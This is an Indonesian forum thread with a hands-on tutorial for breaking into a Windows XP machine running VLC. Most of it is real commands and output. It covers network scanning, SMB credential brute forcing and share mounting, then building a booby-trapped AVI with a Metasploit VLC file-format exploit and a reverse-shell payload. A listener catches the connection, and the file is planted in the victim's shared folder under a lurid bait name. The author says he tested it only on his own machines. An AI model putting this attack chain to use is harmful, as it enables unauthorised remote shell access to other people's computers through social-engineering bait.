vlc Metasploit dengan memanfaatkan fasilitas share folder
#1
ok kembali lagi bersama ane zee eichel super ganteng dan anti maho.. kali ini kita akan belajar metasploit yang berlaku terhadap windows xp3 yang terinstall vlc media player. Knp vlc di bawa-bwa? ya karena exploit ini nantinya akan mengunakan exploit metasploit untuk vlc .

Target : windows xp3 yang terinstall vlc media player
Tested on backtrack R2

First Step --#

Kita coba cek kira2 target apa aja yang lagi idup.. alias kompinya lagi nyala Cool

Code:
root@IBTeam:~# fping -g 192.168.1.32 192.168.1.34
192.168.1.33 is alive
192.168.1.34 is alive
ICMP Host Unreachable from 192.168.1.34 for ICMP Echo sent to 192.168.1.32
ICMP Host Unreachable from 192.168.1.34 for ICMP Echo sent to 192.168.1.32
ICMP Host Unreachable from 192.168.1.34 for ICMP Echo sent to 192.168.1.32
192.168.1.32 is unreachable
root@IBTeam:~#

Second Step --#

ip address 192.168.1.34 itu ip add ane laptop ane ( backtrack ) Tongue sedangkan ip address 192.168.1.33 itu ip address di kompi ane ( windows ) dan yang ekor 32 itu virtualbox ip.. ya memang lagi gk ane pasang .. Tongue
soalnya ini ane test di kamar ane .. ane kan dari dulu cuma ngetes - ngetes gk pernah di praktekan di luar ,.. coz ane bukan hacker :apn:

ok lanjut ah .. berikutnya kita scan ip target ,. dalam hal ini kompi ane yang ane install windows xp3

Code:
root@IBTeam:~# nmap -sS -sV -f -n -O 192.168.1.33

Starting Nmap 5.35DC1 ( http://nmap.org ) at 2011-05-05 14:35 WIT
Nmap scan report for 192.168.1.33
Host is up (0.00055s latency).
Not shown: 992 closed ports
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.2.14 ((Win32) DAV/2 mod_ssl/2.2.14 Op                                                                            enSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.                                                                            0.4 Perl/v5.10.1)
106/tcp  open  pop3pw       Mercury/32 poppass service
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn
143/tcp  open  imap         Mercury/32 imapd 4.72
443/tcp  open  ssl/http     Apache httpd 2.2.14 ((Win32) DAV/2 mod_ssl/2.2.14 Op                                                                            enSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.                                                                            0.4 Perl/v5.10.1)
[color=#FF4500]445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds[/color]
3306/tcp open  mysql        MySQL (unauthorized)
MAC Address: 44:87:FC:56:86:85 (Elitegroup Computer System CO.)
Device type: general purpose
Running: Microsoft Windows XP
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
Network Distance: 1 hop
Service Info: Host: localhost; OS: Windows

OS and Service detection performed. Please report any incorrect results at http:                                                                            //nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.91 seconds
root@IBTeam:~#

ok sudah ane tandai di situ bahwa target cocok.. dan port yang di butuhkan yaitu 445 memang terbuka Tongue

Third Step --#

Nah seperti yang ane janjikan pada judul .. ane hendak memanfaatkan file sharing untuk melakukan iject ..... kita cari tau nyok password jika memang ada dengan memanfaatkan inguma.py

Code:
root@IBTeam:/pentest/exploits/inguma# ./inguma.py
WARNING: No route found for IPv6 destination :: (no default route?)
Inguma Version 0.2
Copyright (c) 2006-2008 Joxean Koret <[email protected]>
Copyright (c) 2009-2011 Hugo Teso <[email protected]>

No module named cx_Oracle
inguma> autoscan
Target host or network: 192.168.1.33
Brute force username and passwords (y/n)[n]: y
Automagically fuzz available targets (y/n)[n]: n
Print to filename (enter for stdout):
Inguma 'autoscan' report started at Thu May  5 14:40:12 2011
------------------------------------------------------------

TCP scanning target 192.168.1.33

Scanning port 17004 (418/418)
Open Ports
----------

Port 135/loc-srv is open
Port 3306/mysql is open
Port 139/netbios-ssn is open
Port 143/imap2 is open
Port 80/www is open
Port 445/microsoft-ds is open

MAC Address target 192.168.1.33

192.168.1.33 MAC: 44:87:fc:56:86:85 Unknow
Checking if is in promiscuous state target 192.168.1.33

Target 192.168.1.33 is promiscuous: False
Identifying services target 192.168.1.33

Port 80: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
Port 135: SMB Server IBTEAM-D7EA8C87-Windows 5.1/Windows 2000 LAN Manager
Port 139: SMB Server IBTEAM-D7EA8C87-Windows 5.1/Windows 2000 LAN Manager
Port 445: SMB Server IBTEAM-D7EA8C87-Windows 5.1/Windows 2000 LAN Manager
Port 3306: Unknow
Port 143: localhost IMAP4rev1 Mercury/32 v4.72 server
Checking what ports are nated target 192.168.1.33

isnated: global name 'IP' is not defined
Detecting operating system target 192.168.1.33

An error ocurred, may be user has not enough privileges or
Couldn't find nmap OS fingerprint DB at data/nmap-os-fingerprints
Gathering NetBIOS information target 192.168.1.33

NetBIOS Information
-------------------

IBTEAM-D7EA8C87  Workstation       44-87-FC-56-86-85 ACTIVE
MSHOME           Workstation       44-87-FC-56-86-85 ACTIVE  GROUP
IBTEAM-D7EA8C87  Server            44-87-FC-56-86-85 ACTIVE
MSHOME           Browser Server    44-87-FC-56-86-85 ACTIVE  GROUP
MSHOME           brother Browser    44-87-FC-56-86-85 ACTIVE
__MSBROWSE__     Unknown           44-87-FC-56-86-85 ACTIVE  GROUP

Is a brother Browser.
MAC Address: 44:87:FC:56:86:85 (Unknow)
Is a Windows based server.
Connecting to the CIFS server target 192.168.1.33

[+] Trying a NULL connection ...
[+] Ok. It works.
Current connection information
------------------------------

Domain name      : MSHOME
Lanman           : Windows 2000 LAN Manager
Server name      : IBTEAM-D7EA8C87
Operative System : Windows 5.1
Server Time      : Thu, 05 May 2011 07:41:35 GMT -7
Session Key      : 0

Is login required? True

Dumping RPC endpoints target 192.168.1.33

[+] Trying an anonymous connection ...

Gathered data
-------------

[+] Retrieving endpoint list from 192.168.1.33
[+] Trying protocol 80/HTTP...
[!] Protocol failed: HTTPTransport instance has no attribute '_HTTPTransport__socket'
[+] Trying protocol 445/SMB...
[!] Protocol failed: SessionError: ('S', 'M', 'B', ' ', 'L', 'i', 'b', 'r', 'a', 'r', 'y', ' ', 'E', 'r', 'r', 'o', 'r'), class: ERRDOS, code: ERRnoaccess(Access denied.)
[+] Trying protocol 135/TCP...
[!] Protocol failed: unpack requires a string argument of length 12
[+] Trying protocol 139/SMB...
[!] Protocol failed: SessionError: ('S', 'M', 'B', ' ', 'L', 'i', 'b', 'r', 'a', 'r', 'y', ' ', 'E', 'r', 'r', 'o', 'r'), class: ERRDOS, code: ERRnoaccess(Access denied.)
[+] Trying protocol 135/UDP...
[!] Protocol failed: timed out

No endpoints found.
Dumping SAM database target 192.168.1.33

[+] Trying an anonymous connection ...
[+] Retrieving endpoint list from 192.168.1.33
[+] Trying protocol 445/SMB...
[!] Protocol failed: SessionError: ('S', 'M', 'B', ' ', 'L', 'i', 'b', 'r', 'a', 'r', 'y', ' ', 'E', 'r', 'r', 'o', 'r'), class: ERRDOS, code: ERRnoaccess(Access denied.)
samrdump: SessionError: ('S', 'M', 'B', ' ', 'L', 'i', 'b', 'r', 'a', 'r', 'y', ' ', 'E', 'r', 'r', 'o', 'r'), class: ERRDOS, code: ERRnoaccess(Access denied.)
Finding 'gold' anonymously in the CIFS shares target 192.168.1.33
Valid credentials *ARE* required for target 192.168.1.33
Use the following syntax prior to rerun the module:

[color=#FF0000]user="username"
password="password"[/color]

seep sudah tuh Tongue hasilnya sudah ane tandai dengna warna merah .....

4th Step --#

ok lanjut aja ya Langkah berikutnya kita buka koneksi file sharingnya agar terkonek dengan backtrack kita Big Grin. gunakan fasilitas smbclient.py

Code:
root@IBTeam:~# cd /pentest/python/impacket-examples
root@IBTeam:/pentest/python/impacket-examples# ./smbclient.py
# open 192.168.1.33
exception! open() takes exactly 3 arguments (2 given)
# open 192.168.1.33 445
# login username
# shares
E$
tools_music
IPC$
print$
SharedDocs
Music
ADMIN$
C$
Printer

Nah perhatikan file2 yang di share oleh kompi target telah muncul . E$ , tools_music, IPC$, print$, SharedDocs, Music, ADMIN$, C$, Printer. Kalo sudah tentu saja kita harus meng amountnya terlebih dahulu untuk nantinya kita memindahkan file backdoor yang akan kita buat pada step selanjutnya

5th Step --#

ok deh sekarang kita amount aja ...di sini ane amount folder tools_music....

Code:
root@IBTeam:~# smbmount //192.168.1.33/tools_music /inject/
mount error: can not change directory into mount target /inject/
root@IBTeam:~# smbmount //192.168.1.33/tools_music /media/
Password:
root@IBTeam:~# cd /media.
bash: cd: /media.: No such file or directory
root@IBTeam:~# cd /media/
root@IBTeam:/media# ls
K-Lite_Codec_Pack_700_Mega.exe  vlc-1.1.9-win32.exe
root@IBTeam:/media#

w0w isi directorynya ternyata ada installer vlc .. bisa kita anggap aja berarti owner kompi target sudah menginstall vlc di komputernya...next om....

6th Step --#

Tiba saatnya kita membuat file backdoornya .....buka terminal metasploitnya

Code:
=[ metasploit v3.6.0-dev [core:3.6 api:1.0]
+ -- --=[ 642 exploits - 326 auxiliary
+ -- --=[ 216 payloads - 27 encoders - 8 nops
       =[ svn r11626 updated 103 days ago (2011.01.22)

Warning: This copy of the Metasploit Framework was last updated 103 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             http://www.metasploit.com/redmine/projects/framework/wiki/Updating

msf > use windows/fileformat/videolan_tivo
msf exploit(videolan_tivo) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(videolan_tivo) > set FILENAME bokep_panas.avi
FILENAME => bokep_panas.avi
msf exploit(videolan_tivo) > set OUTPUTPATH /root/
OUTPUTPATH => /root/
msf exploit(videolan_tivo) > set LHOST 192.168.1.34
LHOST => 192.168.1.34
msf exploit(videolan_tivo) > exploit

[*] Creating 'bokep_panas.avi' file ...
[*] Generated output file /root/bokep_panas.avi
msf exploit(videolan_tivo) > show options

Module options (exploit/windows/fileformat/videolan_tivo):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FILENAME    bokep_panas.avi  yes       The file name.
   OUTPUTPATH  /root/           yes       The location of the file.

done ! kita telah berhasil membuat backdoor vlc file yang tersimpan di directory root

now kita tinggal mengaktifkan saja jurus pamungkas


Code:
=[ metasploit v3.6.0-dev [core:3.6 api:1.0]
+ -- --=[ 642 exploits - 326 auxiliary
+ -- --=[ 216 payloads - 27 encoders - 8 nops
       =[ svn r11626 updated 103 days ago (2011.01.22)

Warning: This copy of the Metasploit Framework was last updated 103 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             http://www.metasploit.com/redmine/projects/framework/wiki/Updating

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/shell_reverse_TCP
[-] The value specified for PAYLOAD is not valid.
msf exploit(handler) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.34
LHOST => 192.168.1.34
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/shell_reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, none, process
   LHOST     192.168.1.34     yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.34:4444
[*] Starting the payload handler...

Last - step

kita pindahkan saja file backdoor yang wa kasi nama tadi bokep_panas.avi ke directory korban ... tunggu korban mengesekusinya .... kapan di klik ya ? kwokwokw berdoa aja

Code:
root@IBTeam:~# mv bokep_panas.avi /media/tools_music
root@IBTeam:~# cd /media/
root@IBTeam:/media# ls
K-Lite_Codec_Pack_700_Mega.exe  vlc-1.1.9-win32.exe bokep_panas.avi
root@IBTeam:/media#

Jika berhasil anda akan mendapatkan akses shell Big Grin
thx to my friend sickness moderator of forum backtrack.org for this tutorial.....
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only

#2
lanjutkan mr zee aku suka metasploit ane tunggub tutorial berikutnya

mr zee ane kasi saran kalo bisa habis nulis kaya ditas.. kalo bisa di upload juga tutornya yah tinggal donlot..
kalo kaya gini harus di pindahin dulu ke office baru di dpf kan kalo mr zee tk keberatan

#3
please post this video

#4
(07-03-2011, 12:36 AM)R-12 Wrote: lanjutkan mr zee aku suka metasploit ane tunggub  tutorial berikutnya

mr zee ane kasi saran kalo bisa habis nulis kaya ditas.. kalo bisa di upload juga tutornya yah tinggal donlot..
kalo kaya gini harus di pindahin dulu ke office baru di dpf kan    kalo mr zee tk keberatan

Yoi kebanyakan di bahas di ASWB mas Smile 

(07-20-2011, 12:29 AM)surendradhaka Wrote: please post this video

Sorry i have not much time Smile 

Btw thread ini udah old trick ... cek tanggal yak :d
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only






Users browsing this thread: 1 Guest(s)